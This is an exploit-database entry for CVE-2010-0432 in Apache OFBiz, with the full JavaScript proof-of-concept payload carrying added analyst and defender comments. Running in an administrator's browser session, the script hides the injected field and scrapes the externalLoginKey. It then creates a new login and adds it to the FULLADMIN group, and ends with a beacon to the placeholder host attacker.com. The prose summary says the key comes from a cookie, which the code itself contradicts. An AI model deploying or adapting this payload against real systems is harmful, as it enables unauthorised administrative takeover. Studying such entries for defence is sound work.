vendor:
OFBiz
by:
Lucas Apa
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: OFBiz
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-0432
CPE: a:apache:ofbiz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2010

Apache OFBiz FULLADMIN Creator PoC Payload

This exploit allows an attacker to bypass authentication and create a user with full administrative privileges in Apache OFBiz. The exploit works by sending a POST request to the /webtools/control/scheduleService endpoint with the externalLoginKey parameter set to the value of the externalLoginKey cookie. The request also includes the username and password of the user to be created, as well as the roleTypeId parameter set to FULLADMIN.

Mitigation:

Upgrade to the latest version of Apache OFBiz and ensure that all users have strong passwords.

Exploit-DB raw data:

/*

Apache OFBiz FULLADMIN Creator PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

*/

// Credentials of the account the payload tries to create. Both values are
// hard-coded; they are the author's placeholders, not anything site-specific.
var username = 'bonsaiUser';
var password = 'bonsaiPass';

// Visual-concealment step: every '.fieldWidth300' element whose first child
// contains the word "script" has its parent hidden. Presumably this hides the
// field that carries the injected payload from whoever is viewing the page.
// Defender note: the markup is only hidden with CSS -- it is still present in
// the DOM and in whatever server-side record rendered it, so it remains
// discoverable by inspecting the stored data rather than the rendered page.
var nodes = document.getElementsByClassName('fieldWidth300');
for (var i=0; i<nodes.length; i++) {
if(/script/.test(nodes[i].children[0].innerHTML)){
nodes[i].parentNode.style.display = "none";
}
}
// Legacy cross-browser XMLHttpRequest factory (2010-era pattern):
//   1. MSXML ActiveX ("Msxml2.XMLHTTP", then "Microsoft.XMLHTTP")
//   2. the native XMLHttpRequest constructor
//   3. window.createRequest (old ICEbrowser API)
// If every attempt fails, xmlhttp stays === false. Nothing below checks for
// that, so on a browser with none of these the later xmlhttp.open(...) call
// throws. The same block is repeated verbatim for xmlhttp2/3/4 further down.
var xmlhttp=false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
xmlhttp=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp = window.createRequest();
} catch (e) {
xmlhttp=false;
}
}

// Step 1: fetch /myportal/control/main in the context of the current browser
// session. The page body is expected to contain an externalLoginKey, which is
// the value the later POSTs need. Note the handler is attached *after*
// send(); this only works because the request is asynchronous (third arg
// true), and is fragile style -- the assignment should precede send().
xmlhttp.open("GET", "/myportal/control/main",true);
xmlhttp.send(null)
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4) {
var text = xmlhttp.responseText;
// Scrapes the key out of the HTML with a regex. No null check: if the
// page does not contain 'externalLoginKey=' the match is null and the
// [1] index throws a TypeError, which ends the payload here.
var regex = /externalLoginKey=(.*?)\"/;
var externalKey = text.match(regex)[1];

// Second XHR factory, same fallback chain as above. xmlhttp2 is assigned
// without `var`, so in non-strict code it becomes an implicit global.
xmlhttp2 = false;
try {
xmlhttp2 = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp2 = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp2 = false;
}
}

if (!xmlhttp2 && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp2 = new XMLHttpRequest();
} catch (e) {
xmlhttp2=false;
}
}
// Tests `xmlhttp` rather than `xmlhttp2` -- looks like a copy-paste slip.
// Since xmlhttp is already an object at this point, this branch never runs.
if (!xmlhttp && window.createRequest) {
try {
xmlhttp2 = window.createRequest();
} catch (e) {
xmlhttp2=false;
}
}
// Step 2: POST to the scheduleService controller, passing the scraped key
// as a query parameter, to run the createUserLogin service synchronously.
// The script copies document.cookie into a "cookie" request header; modern
// browsers refuse to set Cookie via XHR (forbidden header), and a same-origin
// XHR sends the session cookie automatically anyway, so the header is
// redundant at best. Any HttpOnly cookie is not readable here.
var cookie = unescape(document.cookie);
xmlhttp2.open("POST",
"/webtools/control/scheduleService?externalLoginKey="+externalKey,true);
xmlhttp2.onreadystatechange=function() {
if (xmlhttp2.readyState==4) {
// Response of the createUserLogin call is not inspected; the author
// left a debugging alert commented out.
//alert(xmlhttp.responseText)
}
}
xmlhttp2.setRequestHeader("cookie", cookie);
xmlhttp2.setRequestHeader("content-type",
"application/x-www-form-urlencoded");

// Form body assembled from E4X XML literals (<r><![CDATA[...]]></r>).toString().
// E4X is non-standard and was only ever implemented in legacy SpiderMonkey
// (old Firefox); in any other engine these lines are a syntax error, so the
// payload is inert there. The `var` on its own line is legal JS.
var
str1=(<r><![CDATA[POOL_NAME=pool&SERVICE_NAME=createUserLogin&_RUN_SYNC_=Y&currentPassword=]]></r>).toString();
var str2 = (<r><![CDATA[&currentPasswordVerify=]]></r>).toString();
var str3 =
(<r><![CDATA[&enabled=&externalAuthId=&partyId=&passwordHint=&requirePasswordChange=&userLoginId=]]></r>).toString();
// Defender note: the observable artifact of this step is a POST to
// /webtools/control/scheduleService with SERVICE_NAME=createUserLogin and an
// externalLoginKey query parameter, issued from an already-authenticated
// browser session.
var post_data = str1 + password + str2 + password + str3 + username;
xmlhttp2.send(post_data);

// Third XHR factory, same pattern as the first.
var xmlhttp3=false;
try {
xmlhttp3 = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp3 = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp3 = false;
}
}
if (!xmlhttp3 && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp3 = new XMLHttpRequest();
} catch (e) {
xmlhttp3=false;
}
}
if (!xmlhttp3 && window.createRequest) {
try {
xmlhttp3 = window.createRequest();
} catch (e) {
xmlhttp3=false;
}
}

// Step 3: POST to UpdateGeneric for the UserLoginSecurityGroup entity to put
// the new login into the FULLADMIN group. Note this is sent immediately after
// the createUserLogin POST without waiting for it to complete, so the two
// requests race; the order in which the server processes them is not
// guaranteed by this code.
xmlhttp3.open("POST",
"/webtools/control/UpdateGeneric?entityName=UserLoginSecurityGroup&externalLoginKey="+externalKey,true);
xmlhttp3.onreadystatechange=function() {
if (xmlhttp3.readyState==4) {
// Success is inferred only from the string "UserLoginSecurityGroup"
// appearing in the response body -- a weak check that an error page
// echoing the entity name would also satisfy.
if(/UserLoginSecurityGroup/.test(xmlhttp3.responseText)){
// Fourth XHR factory, used only for the completion beacon below.
var xmlhttp4=false;
try {
xmlhttp4 = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp4 = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp4 = false;
}
}
if (!xmlhttp4 && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp4 = new XMLHttpRequest();
} catch (e) {
xmlhttp4=false;
}
}
if (!xmlhttp4 && window.createRequest) {
try {
xmlhttp4 = window.createRequest();
} catch (e) {
xmlhttp4=false;
}
}
// Completion beacon: a cross-origin GET to a placeholder host. As pasted,
// the URL string literal is split across two lines, which is a syntax
// error in JavaScript -- probably a line wrap introduced on copy rather
// than the original text. Defender note: an outbound request from an
// admin's browser to an unexpected external host right after the two
// webtools POSTs above is the egress side of this chain.
xmlhttp4.open("GET", "
http://www.attacker.com/successful-ofbiz-attack.php?done=yes",true);
xmlhttp4.send(null);
}
}
}
xmlhttp3.setRequestHeader("cookie",cookie);
xmlhttp3.setRequestHeader("content-type",
"application/x-www-form-urlencoded");

// str1/str2 are re-declared here with `var`; this is legal (function-scoped
// redeclaration) and simply overwrites the earlier values. The fromDate /
// thruDate / *Stamp values are fixed timestamps baked into the payload, and
// "Update=Crear" is a Spanish-language submit label, which suggests the body
// was captured from a localized install -- TODO confirm against an English UI.
var str1 = (<r><![CDATA[UPDATE_MODE=CREATE&userLoginId=]]></r>).toString();
var str2 =
(<r><![CDATA[&groupId=FULLADMIN&fromDate=2000-02-01+1%3A38%3A44.252&thruDate=2020-02-27+1%3A38%3A49.268&lastUpdatedStamp=2010-02-11+1%3A38%3A56.724&lastUpdatedTxStamp=2010-02-04+1%3A39%3A0.260&createdStamp=2010-02-22+1%3A39%3A2.692&createdTxStamp=2010-02-28+1%3A39%3A6.548&Update=Crear]]></r>).toString();

var post_data2 = str1 + username + str2;

xmlhttp3.send(post_data2);

}
}